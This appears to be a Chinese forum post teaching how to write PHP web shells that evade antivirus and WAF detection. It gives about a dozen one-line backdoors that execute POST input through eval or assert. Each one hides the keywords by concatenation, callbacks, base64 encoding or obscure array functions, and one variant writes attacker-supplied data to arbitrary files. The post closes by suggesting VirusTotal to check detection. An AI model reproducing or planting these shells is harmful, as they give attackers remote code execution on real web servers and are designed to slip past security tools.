1.静态免杀(assert.eval)
<?php
eval($_POST['haha']);
?>
<?php
assert($_POST['haha']);
?>
隐藏关键字(waf检测到assert,eval这个关键词,很大概率会被检测出来,那么我们可以尝试用别的词来生成,具体的生成方式有很多种,这里列举一下常见的几种方式,其实效果都差不多。)
-1拆解合并
<?php
$a = "a"."s";
$b = "e"."r"."t";
$c = $a.$b;
$c($_POST['haha']);
?>
<?php
function fun1($a){
$a($_POST['haha']);
}
fun1(assert);
?>
<?php
function fun1($a){
assert($a);
}
fun1($_POST['haha']);
?>
<?php
class me{
public $a = '';
function __destruct()
{
assert("$this->a");
}
}
$obj = new me;
$obj->a = $_POST['haha'];
?>
-2调用函数(利用各种函数如array_map、array_key、preg_replace、@call_user_func、substr_replace来隐藏关键字)
<?php
@call_user_func(assert,$_POST['haha']);
?>
<?php
$a = substr_replace("assexx","rt",4);
$a($_POST['haha']);
?>
<?php
$a = $_REQUEST['haha'];
$b = "\n";
?>
<?php
function fun(){
return $_POST['haha'];
}
@preg_replace("/nihao/e",fun(),"nihao woshi zj");
?>
<?php
if(isset($_POST['file'])){
$d = 'data';
$$d = $_POST['haha'];//$data
$f = 'fp';
$$f = fopen($_POST['file'],'wb');//$fp
echo fwrite($fp,$data)?'save success':'save fail';
fclose($fp);
}
?>
-3编码
<?php
$a = base64_decode("YXNzZXJ0");
$a($_POST['haha']);
?>
-4冷门回调函数array_uintersect_uassoc函数来回调assert
<?php
$password = "LandGrey";
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
?>
用该网站https://www.virustotal.com/测试
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用。你还可以使用@来通知其他用户。